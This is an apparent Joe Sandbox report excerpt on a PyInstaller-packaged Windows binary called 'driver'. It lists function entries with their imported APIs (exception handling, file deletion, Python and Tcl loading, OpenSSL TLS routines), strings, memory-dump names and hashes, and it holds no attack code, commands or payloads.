Instruction Fuzzy Hash: 3FD1A532A4AB8286F7109F36E8542A977A1FF88F5CF400235DA5D83A96DF7CD105E740

Function 00007FF8A7F83248 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8A7F83264
00007FF8B9F71A90.VCRUNTIME140 ref: 00007FF8A7F83288
RtlCaptureContext.KERNEL32 ref: 00007FF8A7F83291
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8A7F832AB
RtlVirtualUnwind.KERNEL32 ref: 00007FF8A7F832EC
00007FF8B9F71A90.VCRUNTIME140 ref: 00007FF8A7F8331F
IsDebuggerPresent.KERNEL32 ref: 00007FF8A7F83340
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8A7F8335D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8A7F83368

Memory Dump Source

Source File: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true

Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd

Similarity

API ID: 00007ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3558122275-0
Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
Instruction ID: d6a686eea9247cea2beb7fcc735dfa187fe53dd50f20d9e13e7f372ba3eebe28
Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
Instruction Fuzzy Hash: 7B313D7260AB8196FB608F70E850BED7364FB84784F44403ADA4E47B99DF38D648D714

Function 00007FF6A29B83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B841B
RemoveDirectoryW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B849E
DeleteFileW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84BD
FindNextFileW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84CB
FindClose.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84DC
RemoveDirectoryW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84E5

Strings

%s\*, xrefs: 00007FF6A29B83E2

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 7cc6a4d92746292e324e660eb2de845f3e9c3ac26a77af6037049b802c1b9b68
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: F141A521A4E94285EA209B26E4981BD73A1FF98F98F400232D59DC36C7DFBCD546E701

Function 00007FF8A804212B Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8A80BF3A0
RtlCaptureContext.KERNEL32 ref: 00007FF8A80BF3CD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8A80BF3E7
RtlVirtualUnwind.KERNEL32 ref: 00007FF8A80BF428
IsDebuggerPresent.KERNEL32 ref: 00007FF8A80BF47C
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8A80BF499
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8A80BF4A4

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
Instruction ID: d841c69d77e52ffef0d8f1a727cc344a34f2eb84163862e5b507d69dfad434de
Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
Instruction Fuzzy Hash: 26315E7260AA8199EF608F60E8443EE3360FB84784F408039DA4D47B95DF7CD568CB24

Function 00007FF6A29BD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6A29BD1B8
RtlCaptureContext.KERNEL32 ref: 00007FF6A29BD1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6A29BD1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF6A29BD240
IsDebuggerPresent.KERNEL32 ref: 00007FF6A29BD294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6A29BD2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6A29BD2BC

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: 0e530bf6ec4a31556f756fb59efd52d43437f2bc56a48447978c2b5b462c6272
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: B9319672609B8185EB608F61E8503EE33A1FB94B48F044039DB4D87B9ADF7CC548D710

Function 00007FF6A29CA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6A29CA6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6A29CA715
RtlVirtualUnwind.KERNEL32 ref: 00007FF6A29CA750
IsDebuggerPresent.KERNEL32 ref: 00007FF6A29CA789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6A29CA793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6A29CA79E

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 5bc0d29506105087d2c8a1f49be6f8983aebef5fb94696d37093237eca1eef7f
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: C0319632649B8185E724CF25E8503EE73A0FB98B58F540135EA8D87B56DF7CD145D700

Function 00007FF8A8041CBC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON

Download Yara Rule

Strings

tls_construct_new_session_ticket, xrefs: 00007FF8A80B6DCD, 00007FF8A80B6E7E, 00007FF8A80B7009, 00007FF8A80B7083
..\s\ssl\statem\statem_srvr.c, xrefs: 00007FF8A80B6DD9, 00007FF8A80B6E8A, 00007FF8A80B6FA3, 00007FF8A80B6FC3, 00007FF8A80B7015, 00007FF8A80B708F, 00007FF8A80B7167
resumption, xrefs: 00007FF8A80B6EC3
construct_stateful_ticket, xrefs: 00007FF8A80B715B

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID:
String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
API String ID: 0-1194634662
Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
Instruction ID: 31f8748ad1afb994dd932e8d89ba660335ddb6155f73b3aa3fd1a259b6303af2
Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
Instruction Fuzzy Hash: A7D18032B0A682AAFF10DB65D8457A96B90EB85BC4F044036EE4C4B7D6CF3DD551CB28

Function 00007FF6A29D18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D1930
FindFirstFileExW.KERNEL32 ref: 00007FF6A29D1A3A

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction ID: 91e68470de462d66c865fd2ba66edf8e9a75287a0fcb9acb5776d5c6d4e0bee3
Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction Fuzzy Hash: 70B1B423B5A68245EB649B67E5001B963D1EB44FE8F444136EA5D87BCAEFBCE441F300

Function 00007FF8A8041EE2 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 470COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A809CCF4

Strings

D:\a\1\s\include\internal/packet.h, xrefs: 00007FF8A809CAE9, 00007FF8A809CAFD
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FF8A809CB37, 00007FF8A809CE86, 00007FF8A809CED4, 00007FF8A809D002, 00007FF8A809D0DD, 00007FF8A809D13C
tls_parse_ctos_psk, xrefs: 00007FF8A809CE7A, 00007FF8A809CECD, 00007FF8A809CFFB, 00007FF8A809D0D6, 00007FF8A809D135

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
API String ID: 3535234312-3130753023
Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
Instruction ID: 159cb9f9cda39d2e5b5dc27899aa57017ebeb677d2229db6f4517c35d36ceb2e
Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
Instruction Fuzzy Hash: 1712D462A0EA82A5FF109B65D4052BDBB90EF81BC4F014032DE4D4B7D6DF7CE5618B28

Function 00007FF8A80424DC Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 329COMMON

Download Yara Rule

APIs

00007FF8C61208A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8A8093366

Strings

tls_construct_ctos_psk, xrefs: 00007FF8A8093302, 00007FF8A8093476, 00007FF8A80934E2, 00007FF8A809352A, 00007FF8A8093736, 00007FF8A8093774, 00007FF8A80937AB
..\s\ssl\statem\extensions_clnt.c, xrefs: 00007FF8A809330E, 00007FF8A8093482, 00007FF8A80934EE, 00007FF8A8093536, 00007FF8A8093742, 00007FF8A8093780, 00007FF8A80937B7

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID: 00007C61208
String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
API String ID: 3535234312-446233508
Opcode ID: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
Instruction ID: 0139034c6a5bfd93f2c773d5e91f20edc0fe335ba06230ad0286ffddf7668075
Opcode Fuzzy Hash: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
Instruction Fuzzy Hash: BDD1D461B0EA4365FF60AB2295513BEA291EF84BC8F151031ED4D47BC6CF3DE5618B28

Function 00007FF6A29B5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5830
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5842
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5879
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B588B
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58A4
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58B6
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58CF
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58E1
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B58FD
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B590F
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B592B
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B593D
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5959
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B596B
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5987
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B5999
GetProcAddress.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B59B5
GetLastError.KERNEL32(?,00007FF6A29B64BF,?,00007FF6A29B336E), ref: 00007FF6A29B59C7

Strings

PyMarshal_ReadObjectFromString, xrefs: 00007FF6A29B5C5D, 00007FF6A29B5C7F
Py_IsInitialized, xrefs: 00007FF6A29B5921, 00007FF6A29B5943
PyErr_Restore, xrefs: 00007FF6A29B5B77, 00007FF6A29B5B99
PyErr_Clear, xrefs: 00007FF6A29B5A91, 00007FF6A29B5AB3
PyConfig_InitIsolatedConfig, xrefs: 00007FF6A29B59AB, 00007FF6A29B59CD
PyErr_Print, xrefs: 00007FF6A29B5B49, 00007FF6A29B5B6B
PyObject_CallFunction, xrefs: 00007FF6A29B5CE7, 00007FF6A29B5D09
PyConfig_SetBytesString, xrefs: 00007FF6A29B5A07, 00007FF6A29B5A29
PyUnicode_DecodeFSDefault, xrefs: 00007FF6A29B5F0F, 00007FF6A29B5F31
PyConfig_SetWideStringList, xrefs: 00007FF6A29B5A63, 00007FF6A29B5A85
PyObject_Str, xrefs: 00007FF6A29B5D9F, 00007FF6A29B5DC1
PyObject_CallFunctionObjArgs, xrefs: 00007FF6A29B5D15, 00007FF6A29B5D37
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6A29B5DCD, 00007FF6A29B5DEF
Py_DecodeLocale, xrefs: 00007FF6A29B586F, 00007FF6A29B5891
PyMem_RawFree, xrefs: 00007FF6A29B5C8B, 00007FF6A29B5CAD
PyImport_ExecCodeModule, xrefs: 00007FF6A29B5C01, 00007FF6A29B5C23
PyRun_SimpleStringFlags, xrefs: 00007FF6A29B5DFB, 00007FF6A29B5E1D
PySys_GetObject, xrefs: 00007FF6A29B5E57, 00007FF6A29B5E79
PyUnicode_Join, xrefs: 00007FF6A29B5F99, 00007FF6A29B5FBB
Py_DecRef, xrefs: 00007FF6A29B5826, 00007FF6A29B5848
PyModule_GetDict, xrefs: 00007FF6A29B5CB9, 00007FF6A29B5CDB
Py_InitializeFromConfig, xrefs: 00007FF6A29B58F3, 00007FF6A29B5915
PyEval_EvalCode, xrefs: 00007FF6A29B5BA5, 00007FF6A29B5BC7
PyErr_Occurred, xrefs: 00007FF6A29B5B1B, 00007FF6A29B5B3D
PyUnicode_FromString, xrefs: 00007FF6A29B5F6B, 00007FF6A29B5F8D
PySys_SetObject, xrefs: 00007FF6A29B5E85, 00007FF6A29B5EA7
PyStatus_Exception, xrefs: 00007FF6A29B5E29, 00007FF6A29B5E4B
Py_PreInitialize, xrefs: 00007FF6A29B594F, 00007FF6A29B5971
PyConfig_SetString, xrefs: 00007FF6A29B5A35, 00007FF6A29B5A57
GetProcAddress, xrefs: 00007FF6A29B5858
PyUnicode_AsUTF8, xrefs: 00007FF6A29B5EB3, 00007FF6A29B5ED5
PyErr_NormalizeException, xrefs: 00007FF6A29B5AED, 00007FF6A29B5B0F
PyUnicode_Decode, xrefs: 00007FF6A29B5EE1, 00007FF6A29B5F03
PyObject_SetAttrString, xrefs: 00007FF6A29B5D71, 00007FF6A29B5D93
PyErr_Fetch, xrefs: 00007FF6A29B5ABF, 00007FF6A29B5AE1
PyUnicode_Replace, xrefs: 00007FF6A29B5FC7, 00007FF6A29B5FE9
PyConfig_Clear, xrefs: 00007FF6A29B597D, 00007FF6A29B599F
PyConfig_Read, xrefs: 00007FF6A29B59D9, 00007FF6A29B59FB
Failed to get address for %hs, xrefs: 00007FF6A29B5851
Py_ExitStatusException, xrefs: 00007FF6A29B589A, 00007FF6A29B58BC
PyObject_GetAttrString, xrefs: 00007FF6A29B5D43, 00007FF6A29B5D65
PyUnicode_FromFormat, xrefs: 00007FF6A29B5F3D, 00007FF6A29B5F5F
PyImport_AddModule, xrefs: 00007FF6A29B5BD3, 00007FF6A29B5BF5
Py_Finalize, xrefs: 00007FF6A29B58C5, 00007FF6A29B58E7
PyImport_ImportModule, xrefs: 00007FF6A29B5C2F, 00007FF6A29B5C51

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 1a4a8b8ae3738dd822fd62e5b595c0371242586de205768acc21d5c28d3092ec
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 1F229F24ACBB4791FA549B57E8241B423E1BF08F9DF845139D81E82667FFFCA548B240

Function 00007FF6A29B76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6A29B76C7
GetLastError.KERNEL32 ref: 00007FF6A29B76D9
GetProcAddress.KERNEL32 ref: 00007FF6A29B7715
GetLastError.KERNEL32 ref: 00007FF6A29B7727
GetProcAddress.KERNEL32 ref: 00007FF6A29B7740
GetLastError.KERNEL32 ref: 00007FF6A29B7752
GetProcAddress.KERNEL32 ref: 00007FF6A29B776B
GetLastError.KERNEL32 ref: 00007FF6A29B777D
GetProcAddress.KERNEL32 ref: 00007FF6A29B7799
GetLastError.KERNEL32 ref: 00007FF6A29B77AB
GetProcAddress.KERNEL32 ref: 00007FF6A29B77C7
GetLastError.KERNEL32 ref: 00007FF6A29B77D9
GetProcAddress.KERNEL32 ref: 00007FF6A29B77F5
GetLastError.KERNEL32 ref: 00007FF6A29B7807
GetProcAddress.KERNEL32 ref: 00007FF6A29B7823
GetLastError.KERNEL32 ref: 00007FF6A29B7835
GetProcAddress.KERNEL32 ref: 00007FF6A29B7851
GetLastError.KERNEL32 ref: 00007FF6A29B7863

Strings

Tcl_ConditionNotify, xrefs: 00007FF6A29B795B, 00007FF6A29B797D
Tcl_GetCurrentThread, xrefs: 00007FF6A29B7847, 00007FF6A29B7869
Tcl_JoinThread, xrefs: 00007FF6A29B7875, 00007FF6A29B7897
Tcl_GetObjResult, xrefs: 00007FF6A29B7B55, 00007FF6A29B7B77
Tcl_DeleteInterp, xrefs: 00007FF6A29B77EB, 00007FF6A29B780D
